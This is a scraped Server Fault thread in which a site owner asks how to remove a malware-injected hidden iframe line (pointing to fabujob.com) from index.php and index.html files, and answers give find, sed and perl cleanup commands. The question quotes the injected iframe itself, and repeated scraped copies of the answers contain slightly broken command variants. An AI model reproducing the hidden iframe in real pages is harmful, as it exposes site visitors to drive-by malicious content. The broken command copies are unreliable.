Search for index.php and index.html and replace string





I recently had some sort of malware that added the following string(s) to every index.php and index.html file ON THE WEB SERVER:



echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";

echo "<iframe src="http://fabujob.com/?click=AC785" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>";


The parameter after "click=" changes every time; the two lines above are only examples.



Is there a quick way to find and remove these lines?






EDIT: The files are on my web server, which I can only reach over FTP, so I can't simply use find there...


































  • You want to do what the malware is doing?

    – random
    Jul 18 '09 at 8:29











  • No. I want to remove the line!

    – Jonas
    Jul 18 '09 at 15:54

















Tags: ftp, replace






edited May 21 at 13:50 by yagmoth555

asked Jul 18 '09 at 0:17 by Jonas












5 Answers

One easy way to do this is with find and grep, plus perl to do the edits.

First, construct a list of filenames that have been compromised:

find /path/to/web/site \( -name 'index.htm*' -o -name 'index.php' \) -print0 |
xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt

(Note the parentheses: without them, -print0 would apply only to the second -name test.)

Next, use perl to edit the files and remove the exploit:

cat /tmp/compromised-files.txt |
xargs -d '\n' perl -n -i.BAK -e 'print unless m/fabujob\.com/i'

(Yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand.)

That will delete every line containing the string "fabujob.com" from each of the compromised files. It also keeps a backup of each file as filename.BAK so you can easily restore them if something goes wrong; delete the backups when you no longer need them.

This perl one-liner is based on the sample you gave, which appears to indicate that the attack added an entire line containing the exploit, so it prints every line EXCEPT those containing the exploit's URL. If that's not actually the case, you'll have to come up with a more appropriate script :)

This is a generic technique that you can use to make any automated edits to a batch of files. You can use any perl code to do the job, and perl has a huge swag of text-manipulation capabilities.

BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. That way it doesn't matter if you screw up the editing script...just rsync the original back over the working dir. Once you've got the script exactly right, you can then run it on the real files.

– cas (answered Jul 18 '09 at 1:40)







  • Thanks for this extraordinarily awesome answer, but unfortunately I forgot to mention that it is on my web server (FTP), not on my local computer

    – Jonas
    Jul 18 '09 at 16:10











  • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

    – cas
    Jul 18 '09 at 23:02











  • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

    – cas
    Jul 18 '09 at 23:03











  • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

    – Jonas
    Jul 18 '09 at 23:22



















sed and find should help you, but sed takes some time to learn (enough that I can't come up with a working command off the top of my head right now).

Also, there are GUI editors that can find and replace across a whole directory tree (e.g. TextMate on the Mac). You would then use a regex to cover the variable part.

– Sven (answered Jul 18 '09 at 0:28)
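For the record, here is one possible sed invocation of the kind described above. It is only a sketch: it assumes GNU sed's -i option and that every injected line mentions the exploit domain, and it runs against a throwaway file rather than a live tree.

```shell
# Delete every line mentioning fabujob.com from index.html/index.php files,
# keeping a .bak backup of each. Demonstrated on a scratch directory.
webroot=$(mktemp -d)    # stand-in for the real web root
cat > "$webroot/index.html" <<'EOF'
<html><body>
echo "<iframe src="http://fabujob.com/?click=AD4A4" width=1 height=1></iframe>";
<p>real page content</p>
</body></html>
EOF

find "$webroot" \( -name 'index.html' -o -name 'index.php' \) \
    -exec sed -i.bak '/fabujob\.com/d' {} +

cat "$webroot/index.html"
```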






Try tools like regexxer or rpl. Their whole purpose is project-wide replacements: they support recursive directory traversal and let you choose which file types the replacement should be applied to.

– Saurabh Barjatiya (answered Jul 18 '09 at 3:31)






Assuming that the domain is always the same and shouldn't legitimately appear anywhere:

find <documentroot> \( -name 'index.html' -or -name 'index.php' \) \
    -exec sed -i'.bak' '/fabujob\.com/d' {} \;

Originals will be saved with the extension '.bak'. You can use plain -i if you don't want backups.






If you know you have no legitimate <iframe> tags in your documents, you can simply do

perl -i -n -e 'print unless /<iframe/' $(find . -name index.html)

(The pattern matches the opening <iframe without the closing bracket, since the injected tags carry attributes.) If you do have iframes, then you'll need to make your regex more exact.

Perl's -i flag is far too often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
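A tiny rehearsal of the -i behaviour on a scratch file (the filename is a throwaway mktemp path, not a real index.html):

```shell
# perl -i rewrites the file in place; -n loops over its lines without
# printing, so 'print unless /<iframe/' keeps everything except iframe lines.
f=$(mktemp)
printf '%s\n' 'first line' \
    '<iframe src="http://example.invalid/x"></iframe>' \
    'last line' > "$f"

perl -i -n -e 'print unless /<iframe/' "$f"

cat "$f"
```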






        share|improve this answer























          Your Answer








          StackExchange.ready(function()
          var channelOptions =
          tags: "".split(" "),
          id: "2"
          ;
          initTagRenderer("".split(" "), "".split(" "), channelOptions);

          StackExchange.using("externalEditor", function()
          // Have to fire editor after snippets, if snippets enabled
          if (StackExchange.settings.snippets.snippetsEnabled)
          StackExchange.using("snippets", function()
          createEditor();
          );

          else
          createEditor();

          );

          function createEditor()
          StackExchange.prepareEditor(
          heartbeatType: 'answer',
          autoActivateHeartbeat: false,
          convertImagesToLinks: true,
          noModals: true,
          showLowRepImageUploadWarning: true,
          reputationToPostImages: 10,
          bindNavPrevention: true,
          postfix: "",
          imageUploader:
          brandingHtml: "Powered by u003ca class="icon-imgur-white" href="https://imgur.com/"u003eu003c/au003e",
          contentPolicyHtml: "User contributions licensed under u003ca href="https://creativecommons.org/licenses/by-sa/3.0/"u003ecc by-sa 3.0 with attribution requiredu003c/au003e u003ca href="https://stackoverflow.com/legal/content-policy"u003e(content policy)u003c/au003e",
          allowUrls: true
          ,
          onDemand: true,
          discardSelector: ".discard-answer"
          ,immediatelyShowMarkdownHelp:true
          );



          );













          draft saved

          draft discarded


















          StackExchange.ready(
          function ()
          StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fserverfault.com%2fquestions%2f42393%2fsearch-for-index-php-and-index-html-and-replace-string%23new-answer', 'question_page');

          );

          Post as a guest















          Required, but never shown

























          5 Answers
          5






          active

          oldest

          votes








          5 Answers
          5






          active

          oldest

          votes









          active

          oldest

          votes






          active

          oldest

          votes









          2














          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer























          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22















          2














          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer























          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22













          2












          2








          2







          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.






          share|improve this answer













          one easy way to do this is by using find and grep, plus perl to do the edits.



          first, construct a list of filenames that have been compromised:




          find /path/to/web/site -name 'index.htm*' -o -name 'index.php' -print0 |
          xargs -0 grep -l 'iframe src.*fabujob.com' > /tmp/compromised-files.txt


          next, use perl to edit the files and remove the exploit:




          cat /tmp/compromised-files.txt |
          xargs -d 'n' perl -n -i.BAK -e 'print unless m/fabujob.com/i'


          (yes, for the UUOC pedants out there, that is a Useless Use of Cat, but it makes the example easier to read and understand)



          that will delete every line containing the string "fabujob.com" from each of the compromised files. It will also keep a backup of each file as filename.BAK so you can easily restore them if something goes wrong. you should delete them when you no longer need them.



          this perl script is based on the sample you gave which appears to indicated that the attack added an entire line containing the exploit, so this script prints every line EXCEPT those containg the exploit's URL. if that's not actually the case, then you'll have to come up with a more appropriate script :)



          this is a generic technique that you can use to make any automated edits to a batch of files. you can use any perl code to do the job, and perl has a huge swag of text manipulation capabilities.



          BTW, when doing this kind of work, ALWAYS make a copy of the entire directory tree involved and work on that first. that way it doesn't matter if you screw up the perl editing script...just rsync the original back over the working dir. once you've got the script exactly right, you can then run it on the real files.







          share|improve this answer












          share|improve this answer



          share|improve this answer










          answered Jul 18 '09 at 1:40









          cascas

          5,6472229




          5,6472229












          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22

















          • Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

            – Jonas
            Jul 18 '09 at 16:10











          • if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

            – cas
            Jul 18 '09 at 23:02











          • alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

            – cas
            Jul 18 '09 at 23:03











          • Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

            – Jonas
            Jul 18 '09 at 23:22
















          Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

          – Jonas
          Jul 18 '09 at 16:10





          Thanks for this extraordinary awesome anser but unfortunately I forgot to tell taht it was on my webserver, ftp, not on my local computer

          – Jonas
          Jul 18 '09 at 16:10













          if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

          – cas
          Jul 18 '09 at 23:02





          if you can run CGI or php scripts on the web server, then you can upload a script that does the above (or the similar answer by Dan C using find & sed), but you'll have to be very careful about paths. you'll need to know the full path to your Document Root dir, and the full path to the programs (find, xargs, perl, sed, etc). running scripts semi-blindly like this makes it even more important to do test runs on a backup copy of the files first.

          – cas
          Jul 18 '09 at 23:02













          alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

          – cas
          Jul 18 '09 at 23:03





          alternatively, rsync or ftp the entire site down to your local computer, work on it there, then rsync or ftp it back up to your web server. you really ought to have a complete copy of your site on your own machines anyway. no matter how good the hosting company is, relying on them solely for backup is a bad idea.

          – cas
          Jul 18 '09 at 23:03













          Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

          – Jonas
          Jul 18 '09 at 23:22





          Yeah, I made a resync of my ftp :> Everything works fine again :> Thank you!

          – Jonas
          Jul 18 '09 at 23:22













          0














          sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



          Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






          share|improve this answer



























            0














            sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



            Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






            share|improve this answer

























              0












              0








              0







              sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



              Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.






              share|improve this answer













              sed and find should help you, but sed take some time to learn (enough that I can't come up with a possible command from my mind right now).



              Also, there are gui editors that are capable of find and replace in a whole directory tree (i.e. Textmate on the Mac). You would then use a regex to cover the variable part.







              share|improve this answer












              share|improve this answer



              share|improve this answer










              answered Jul 18 '09 at 0:28









              SvenSven

              88.5k10150202




              88.5k10150202





















                  0














                  Try regexxer or rpl type tools. Their whole purpose is project wide replacements. They support recursive directories and let you choose file types to which replacement should be applied.
                      answered Jul 18 '09 at 3:31









                      Saurabh Barjatiya
                          Assuming that the domain is always the same and shouldn't legitimately exist anywhere:



                          find <documentroot> \( -name 'index.html' -or -name 'index.php' \) \
                          -exec sed -i'.bak' '/fabujob.com/d' {} \;


                          Originals will be saved with the extension '.bak'. You can just use -i if you don't want backups.
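                          Before running the destructive version, sed's -n/p combination will show which lines would be deleted; a quick dry-run sketch (same pattern as above, filename as an example):

```shell
# Dry run: print (rather than delete) the lines matching the pattern,
# so you can confirm nothing legitimate would be removed.
sed -n '/fabujob\.com/p' index.html
```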
                              edited Jul 18 '09 at 10:31
                              answered Jul 18 '09 at 9:44









                              Dan Carley
                                  If you know you have no <iframe> tags in your documents, you can simply do



                                  perl -i -n -e'print unless /<iframe>/' $(find . -name index.html)


                                  If you do have iframes, then you'll need to make your regex more exact.



                                  Perl's -i flag is too often overlooked. It means "edit in place". See http://petdance.com/perl/command-line-options.pdf for more examples of magic to be done in Perl from the command line.
                                      answered May 3 '10 at 18:46









                                      Andy Lester